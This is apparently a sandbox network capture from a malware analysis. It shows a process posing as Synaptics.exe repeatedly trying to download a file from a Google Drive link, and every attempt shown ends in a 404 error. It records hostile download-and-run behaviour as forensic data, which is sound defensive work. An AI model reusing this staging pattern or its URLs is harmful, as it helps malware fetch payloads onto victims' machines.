2024-12-30 10:25:34 UTC	1314	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:25:34 GMT Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: script-src 'report-sample' 'nonce-BGBcVIiyDOdGoesPJelIEw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.10	49886	216.58.206.46	443	7936	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:25:34 UTC	143	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache
2024-12-30 10:25:34 UTC	1314	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:25:34 GMT Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-yWNg7lM6PM-LqsjLVnfI3Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.10	49894	216.58.206.46	443	7936	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:25:35 UTC	143	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache
2024-12-30 10:25:35 UTC	1314	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:25:35 GMT Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-4urLjbVmGR8s3gSbbLZ8ag' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.10	49896	216.58.206.46	443	7936	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:25:35 UTC	143	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache
2024-12-30 10:25:35 UTC	1314	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:25:35 GMT Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-On1dnblkaMqmw7twIozjfQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.10	49893	142.250.184.225	443	7936	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:25:35 UTC	388	OUT	GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=giWRGKWY-fISdODHZz7udS2avMX-23VocVWAKZmesQ-SVvai50uaR9IBc173bp_c_K0VNH2MjbWvibMjWnHspp_TrwSz_nK5TSpP4DpuQbA_LtitgNWO3Oz6oZs1_v56QFegf73mpAja90a4d66n4GPGtOhRZAHfy6hx0OjuQf7xi8yuMhzKymFR
2024-12-30 10:25:35 UTC	1243	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFiumC77WpdRr0e-a-hoMhmO-gNrrz7SE_10Tq-2E5_WzryIpur5RYk1VcQUq0S6dCAAcKCR Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:25:35 GMT Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: script-src 'report-sample' 'nonce-YJwDoXf8C61veYQXXsrclw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-30 10:25:35 UTC	147	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 10:25:35 UTC	1390	IN	Data Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 69 35 73 43 6b 6b 32 6a 33 76 53 6b 6e 49 6e 74 4e 55 4c 50 55 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 Data Ascii: t Found)!!1</title><style nonce="i5sCkk2j3vSknIntNULPUg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 10:25:35 UTC	115	IN	Data Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.10	49895	142.250.184.225	443	7936	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:25:35 UTC	388	OUT	GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=giWRGKWY-fISdODHZz7udS2avMX-23VocVWAKZmesQ-SVvai50uaR9IBc173bp_c_K0VNH2MjbWvibMjWnHspp_TrwSz_nK5TSpP4DpuQbA_LtitgNWO3Oz6oZs1_v56QFegf73mpAja90a4d66n4GPGtOhRZAHfy6hx0OjuQf7xi8yuMhzKymFR
2024-12-30 10:25:36 UTC	1250	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFiumC6cqMcIpziQYzUl1gETvAmNf_9eJ063mEzoWUXHxkt8kZhkb06YFmJTTXFwSpZ661mLHPA4w6c Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:25:35 GMT Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: script-src 'report-sample' 'nonce-jTNw9WWon9TID_7f683lZA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-30 10:25:36 UTC	140	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 10:25:36 UTC	1390	IN	Data Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6f 78 78 43 49 32 59 4f 74 6a 4a 42 53 6d 7a 49 71 63 66 4d 4f 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b Data Ascii: 404 (Not Found)!!1</title><style nonce="oxxCI2YOtjJBSmzIqcfMOQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 10:25:36 UTC	122	IN	Data Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.10	49910	216.58.206.46	443	7936	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:25:36 UTC	143	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache
2024-12-30 10:25:36 UTC	1314	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:25:36 GMT Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download Strict-Transport-Security: max-age=31536000 Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-9bdbfxcDZLEphIOEvb1igA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.10	49911	216.58.206.46	443	7936	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:25:36 UTC	143	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache
2024-12-30 10:25:36 UTC	1314	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:25:36 GMT Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-rAMZqwJNQVSZCfZBF3YAfQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.10	49912	142.250.184.225	443	7936	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:25:36 UTC	388	OUT	GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=giWRGKWY-fISdODHZz7udS2avMX-23VocVWAKZmesQ-SVvai50uaR9IBc173bp_c_K0VNH2MjbWvibMjWnHspp_TrwSz_nK5TSpP4DpuQbA_LtitgNWO3Oz6oZs1_v56QFegf73mpAja90a4d66n4GPGtOhRZAHfy6hx0OjuQf7xi8yuMhzKymFR
2024-12-30 10:25:36 UTC	1250	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFiumC4cVaEoS_3tl8G1jRh_Pyp_DngKQPcjw_Sth9BdSegn3brRrjJ2Om3DlmcQOyvQUpfFfNCffYQ Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:25:36 GMT Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: script-src 'report-sample' 'nonce-BRUjXSBjQS6ydYsXqnDRMQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-30 10:25:36 UTC	140	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 10:25:36 UTC	1390	IN	Data Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6b 69 2d 41 61 61 33 30 49 31 6d 79 5a 49 6d 74 36 6f 36 5f 65 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b Data Ascii: 404 (Not Found)!!1</title><style nonce="ki-Aaa30I1myZImt6o6_eg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 10:25:36 UTC	122	IN	Data Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.10	49913	142.250.184.225	443	7936	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:25:36 UTC	388	OUT	GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=giWRGKWY-fISdODHZz7udS2avMX-23VocVWAKZmesQ-SVvai50uaR9IBc173bp_c_K0VNH2MjbWvibMjWnHspp_TrwSz_nK5TSpP4DpuQbA_LtitgNWO3Oz6oZs1_v56QFegf73mpAja90a4d66n4GPGtOhRZAHfy6hx0OjuQf7xi8yuMhzKymFR
2024-12-30 10:25:37 UTC	1250	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFiumC7F3Tj1BTxkYXHg6yPaMFR5pwbnDv72DTeJwDAwOA9bqebLoZX_y-rLUzEmpN9My4oZ75mmSSs Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:25:36 GMT Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-pWu2O5T3Iy_-2CmlACyqjw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
